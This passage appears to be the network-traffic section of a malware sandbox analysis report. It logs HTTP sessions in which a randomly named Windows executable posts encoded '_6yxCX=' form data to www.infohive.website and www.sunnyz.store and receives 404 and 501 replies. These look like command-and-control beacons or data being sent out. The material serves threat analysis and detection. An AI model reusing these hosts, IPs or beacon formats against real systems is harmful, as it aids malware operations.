3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49985	66.29.149.46	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:11.518208027 CET	885	OUT	POST /cnve/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.infohive.website Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 227 Cache-Control: no-cache Origin: http://www.infohive.website Referer: http://www.infohive.website/cnve/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6e 6a 74 5a 4e 44 6e 36 53 34 74 78 56 70 44 6b 52 38 37 49 6a 72 2b 32 49 55 35 6b 73 51 54 37 6e 37 49 52 51 54 39 53 55 66 65 4e 55 42 68 56 48 48 48 5a 61 63 4d 56 6f 6d 71 74 4a 76 42 61 36 70 74 57 63 50 35 50 58 33 77 76 64 56 61 55 2f 4e 50 57 64 61 6f 39 4a 52 56 4a 74 72 74 56 50 69 70 56 6b 6d 65 73 6c 39 46 6a 43 2b 58 2b 6d 72 33 6a 69 6b 61 4d 54 63 2f 6f 31 72 63 71 4e 6d 66 68 58 39 6d 70 44 51 56 59 54 4b 66 58 4f 55 43 64 50 4a 43 48 74 75 30 66 6f 6e 6e 54 6a 49 56 45 79 49 67 4e 41 38 6c 71 46 53 6d 61 50 64 56 68 68 52 38 7a 6b 35 34 49 35 46 52 6e 76 70 75 55 36 6f 37 4a 76 62 6d 32 4c 41 5a 42 Data Ascii: _6yxCX=7XryTos10RqWnjtZNDn6S4txVpDkR87Ijr+2IU5ksQT7n7IRQT9SUfeNUBhVHHHZacMVomqtJvBa6ptWcP5PX3wvdVaU/NPWdao9JRVJtrtVPipVkmesl9FjC+X+mr3jikaMTc/o1rcqNmfhX9mpDQVYTKfXOUCdPJCHtu0fonnTjIVEyIgNA8lqFSmaPdVhhR8zk54I5FRnvpuU6o7Jvbm2LAZB
Jan 10, 2025 20:20:12.712872982 CET	637	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:20:12 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49986	66.29.149.46	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:14.069173098 CET	1902	OUT	POST /cnve/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.infohive.website Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1243 Cache-Control: no-cache Origin: http://www.infohive.website Referer: http://www.infohive.website/cnve/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6e 6a 74 5a 4e 44 6e 36 53 34 74 78 56 70 44 6b 52 38 37 49 6a 72 2b 32 49 55 35 6b 73 51 72 37 6e 49 41 52 52 77 6c 53 56 66 65 4e 4b 52 68 51 48 48 48 2b 61 66 38 52 6f 6e 58 61 4a 73 35 61 31 76 68 57 56 61 56 50 64 33 77 76 52 31 61 56 31 74 50 35 64 61 59 35 4a 52 46 4a 74 72 74 56 50 67 42 56 6a 33 65 73 6a 39 46 73 55 75 58 49 78 62 32 2b 69 6b 54 35 54 66 54 34 31 62 38 71 4f 46 33 68 57 4f 4f 70 50 51 56 57 51 4b 66 50 4f 55 47 47 50 4a 65 44 74 75 52 43 6f 6e 66 54 7a 4d 45 49 33 37 77 4b 64 74 52 30 43 43 4b 2b 55 6f 68 37 6e 54 34 45 73 4a 4d 56 77 47 6c 76 34 76 75 4a 78 38 43 37 7a 2f 32 42 46 6e 41 5a 73 62 73 41 48 4a 66 61 51 58 4d 45 4f 57 6f 50 69 55 62 77 6e 74 37 78 4e 63 36 38 75 45 76 4c 43 77 4a 75 6d 75 38 32 68 67 6f 38 7a 46 72 73 46 42 42 55 33 79 41 66 78 53 33 52 53 58 4e 71 66 47 6e 6f 69 72 76 55 32 66 46 56 6b 4c 32 77 57 53 49 61 55 31 73 35 69 6a 43 75 2f 37 30 4f 32 53 4f 62 50 39 30 62 78 45 68 76 30 6f 2b [TRUNCATED] Data Ascii: _6yxCX=7XryTos10RqWnjtZNDn6S4txVpDkR87Ijr+2IU5ksQr7nIARRwlSVfeNKRhQHHH+af8RonXaJs5a1vhWVaVPd3wvR1aV1tP5daY5JRFJtrtVPgBVj3esj9FsUuXIxb2+ikT5TfT41b8qOF3hWOOpPQVWQKfPOUGGPJeDtuRConfTzMEI37wKdtR0CCK+Uoh7nT4EsJMVwGlv4vuJx8C7z/2BFnAZsbsAHJfaQXMEOWoPiUbwnt7xNc68uEvLCwJumu82hgo8zFrsFBBU3yAfxS3RSXNqfGnoirvU2fFVkL2wWSIaU1s5ijCu/70O2SObP90bxEhv0o+aCp0pyGmNdGpXLiPxk8nL75le1zERkXo0GYtYutfAdo3UQV1zc0BMULKAhk8rvw7itbMQUxTLHDQ+wHWZ044Z2RICSkpkCtEIX85foVCVDJ60yqoVs8hqWrmtNNl2J6QWeLwrPSPJ7S73e/hGVca3uqkfmISl3fG0QUBCs59hzcacHDJUQn1Ob6RF/aX435r0flbhiiHb2nJ9mI7NkiwX1oU3ULxRwLH7sPzgYsXEH1JlyHTHMHUt2eAqfXB+dCkF/8GvqymSAvz3FmkXgj/xquOqLXtfMIHCuxUXGBCHTEsOzokHC6xRjQDt5Ezxe7Yn5y4/cIUcv3fuj9QGBG/Iny0H3fkMItU/NlmxDg36NHKuNCrlin60aw8T0XrimvBDrsGv81kcGdFCqzm0sme2tNofJVgTlHyjUNIX/BILk+Xl/TfhXSzkKX+qRyomFTYHYSuliKx2bO1sCoHEWJqHZEYj6koSMTNcwFNraII3+V1z42MTT3TPxuESBR0WclmY6Zv12HlViSKp4Iq7+6ZE20MsbUe/njlVgmW77X84ZcJQgUVCZ3cVVJLLtAI3zloqYBX+PneOizfP2SuiH/yqmgICVYDped7jB2l3moJ9cw/8ncsIDRlxTua9xBMQUECbd9keu3JrZFJeXkaDPljLHbtNv3bnYPFny [TRUNCATED]
Jan 10, 2025 20:20:14.779397964 CET	637	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:20:14 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49987	66.29.149.46	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:16.608289957 CET	597	OUT	GET /cnve/?_6yxCX=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVb2keDweLuNLSNaolEzc2iohrJiN1i0expP9eRIP5s9rm3Q==&vNTT0=e8zLx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.infohive.website Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Jan 10, 2025 20:20:17.190666914 CET	652	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:20:17 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49988	217.70.184.50	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:22.285085917 CET	853	OUT	POST /ead0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sunnyz.store Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 207 Cache-Control: no-cache Origin: http://www.sunnyz.store Referer: http://www.sunnyz.store/ead0/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 48 6d 61 55 71 57 6f 30 34 54 78 55 45 43 33 78 4a 36 45 6b 77 79 34 74 6a 79 43 73 48 4d 71 76 4c 41 6b 57 34 47 56 6c 2f 50 76 65 36 2b 57 38 75 55 51 48 36 47 6c 66 7a 42 36 31 39 39 41 58 63 36 69 67 78 53 2f 76 6b 38 6d 75 74 5a 55 6c 55 54 4b 68 67 58 42 35 4e 42 53 78 33 59 35 2f 6f 51 47 34 70 73 2f 46 37 57 51 75 72 34 4a 47 72 70 49 47 37 67 66 57 55 78 4a 34 4d 65 78 49 65 43 52 32 64 4f 47 4d 2f 2f 51 67 43 6e 65 56 63 6c 30 6e 79 55 6a 70 78 77 53 6f 46 39 66 2f 48 58 67 4f 51 37 56 50 59 52 6a 6a 34 51 6d 36 76 67 77 6c 43 63 4d 7a 70 72 38 3d Data Ascii: _6yxCX=DyPyhmSylgtmHmaUqWo04TxUEC3xJ6Ekwy4tjyCsHMqvLAkW4GVl/Pve6+W8uUQH6GlfzB6199AXc6igxS/vk8mutZUlUTKhgXB5NBSx3Y5/oQG4ps/F7WQur4JGrpIG7gfWUxJ4MexIeCR2dOGM//QgCneVcl0nyUjpxwSoF9f/HXgOQ7VPYRjj4Qm6vgwlCcMzpr8=
Jan 10, 2025 20:20:22.898444891 CET	608	IN	HTTP/1.1 501 Unsupported method ('POST') Server: nginx Date: Fri, 10 Jan 2025 19:20:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED] Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49989	217.70.184.50	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:24.836882114 CET	873	OUT	POST /ead0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sunnyz.store Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 227 Cache-Control: no-cache Origin: http://www.sunnyz.store Referer: http://www.sunnyz.store/ead0/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 56 57 4b 55 73 31 51 30 76 6a 78 54 42 43 33 78 43 61 45 6f 77 79 30 74 6a 7a 58 7a 47 2b 65 76 4f 51 55 57 71 54 68 6c 78 76 76 65 31 65 57 6c 71 55 51 79 36 47 6f 67 7a 45 61 31 39 39 6b 58 63 36 53 67 77 6c 4c 6f 2b 4d 6d 73 6c 35 55 6e 61 7a 4b 68 67 58 42 35 4e 46 43 58 33 59 68 2f 70 68 32 34 34 39 2f 47 6b 6d 51 70 39 6f 4a 47 67 4a 49 64 37 67 66 67 55 77 56 57 4d 64 5a 49 65 41 35 32 64 38 75 4e 6b 50 51 71 63 58 66 47 53 31 56 35 39 30 58 62 37 43 72 49 59 37 61 48 50 42 52 6b 4b 5a 64 6e 4c 78 50 62 6f 44 75 4e 2b 51 52 4d 59 2f 63 44 33 38 70 65 33 52 6c 69 39 73 4c 65 62 70 7a 76 6a 6c 55 79 4d 77 30 59 Data Ascii: _6yxCX=DyPyhmSylgtmVWKUs1Q0vjxTBC3xCaEowy0tjzXzG+evOQUWqThlxvve1eWlqUQy6GogzEa199kXc6SgwlLo+Mmsl5UnazKhgXB5NFCX3Yh/ph2449/GkmQp9oJGgJId7gfgUwVWMdZIeA52d8uNkPQqcXfGS1V590Xb7CrIY7aHPBRkKZdnLxPboDuN+QRMY/cD38pe3Rli9sLebpzvjlUyMw0Y
Jan 10, 2025 20:20:25.474284887 CET	608	IN	HTTP/1.1 501 Unsupported method ('POST') Server: nginx Date: Fri, 10 Jan 2025 19:20:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED] Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49990	217.70.184.50	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:27.439835072 CET	1890	OUT	POST /ead0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sunnyz.store Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1243 Cache-Control: no-cache Origin: http://www.sunnyz.store Referer: http://www.sunnyz.store/ead0/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 56 57 4b 55 73 31 51 30 76 6a 78 54 42 43 33 78 43 61 45 6f 77 79 30 74 6a 7a 58 7a 47 2b 47 76 53 79 63 57 34 67 35 6c 79 76 76 65 72 4f 57 34 71 55 51 56 36 47 41 6b 7a 45 48 43 39 2f 73 58 61 62 79 67 6c 6b 4c 6f 72 63 6d 73 70 5a 55 71 55 54 4b 77 67 58 52 39 4e 42 6d 58 33 59 68 2f 70 69 75 34 6f 63 2f 47 2f 6d 51 75 72 34 4a 61 72 70 4a 79 37 67 58 65 55 77 68 6f 4d 73 35 49 66 67 70 32 4f 66 47 4e 6f 50 51 6b 64 58 65 42 53 31 5a 59 39 30 36 67 37 47 6a 75 59 38 75 48 5a 6d 73 34 59 37 64 47 64 68 75 2b 36 45 53 4d 2f 33 42 35 5a 4d 30 74 32 4f 49 39 7a 43 6c 42 2f 62 48 6c 62 71 71 5a 39 54 45 6e 41 46 46 4b 53 41 69 52 41 31 34 47 42 51 7a 4c 6b 6b 56 33 6d 58 6f 47 64 33 34 34 4b 70 6a 53 44 47 73 75 67 4a 52 4d 73 74 37 48 4d 70 7a 58 32 74 54 58 6e 53 39 62 70 67 45 4b 62 35 31 53 34 45 31 73 79 68 51 42 47 33 64 39 50 65 6a 4e 4b 67 4a 31 59 62 4a 56 51 69 5a 66 53 43 6f 2f 6c 6d 43 47 62 5a 6d 30 31 67 51 32 30 4e 6d 62 61 68 52 [TRUNCATED] Data Ascii: _6yxCX=DyPyhmSylgtmVWKUs1Q0vjxTBC3xCaEowy0tjzXzG+GvSycW4g5lyvverOW4qUQV6GAkzEHC9/sXabyglkLorcmspZUqUTKwgXR9NBmX3Yh/piu4oc/G/mQur4JarpJy7gXeUwhoMs5Ifgp2OfGNoPQkdXeBS1ZY906g7GjuY8uHZms4Y7dGdhu+6ESM/3B5ZM0t2OI9zClB/bHlbqqZ9TEnAFFKSAiRA14GBQzLkkV3mXoGd344KpjSDGsugJRMst7HMpzX2tTXnS9bpgEKb51S4E1syhQBG3d9PejNKgJ1YbJVQiZfSCo/lmCGbZm01gQ20NmbahRgAutxkWAiWl1izBn4r0mPaxZQAEpjLCqp4vXhVs+cDKYOU0sRW4wMzkh8y9aKOKLfNjlIPVsyk/ESg7lUzSNBtCjAsPeUxSgncb+F80g4wgyoSaRzqGqg9wzTBFErrqAJc3yBGjDguRKl2ZJKAZ4EJjbPxqfjMvY9dOxItVjVt6/26ZhtOFVlwMUaCstu2TxvXPOcnogcHZY7k32d+mMAxM/MH6JUxkfjMTfcEnVujfDRyiX740g581LOik5ZZkchGIu6Fxmz8urCIGUSnR3+bX0256LlaIJFGPVzU4g90MMiS80dWSpF9XRqaj11f69mbgNf1sj9YU3PKjcQTaqIBIEoRVwttK55K4hQQd70R85bNBca7rRKyvBhSC1bMP430RKpAbPzYOuon+Ff2y6YRAISIpkJWWXzSmFy/PLV3eSpkiBYkMJ48XX+VGR8uQN5NXhg5cysoA2cjxXkYzqa0b88wj1Aruv61kGUPTQkT+VS4pSWqffz8ljMk3vbmf1baRXDfinuE+0Bo/XGxP9SI1A7q7ERdL/zFXKWP6/NjZeBNDPEn7IsA7LKLAYVCiedB7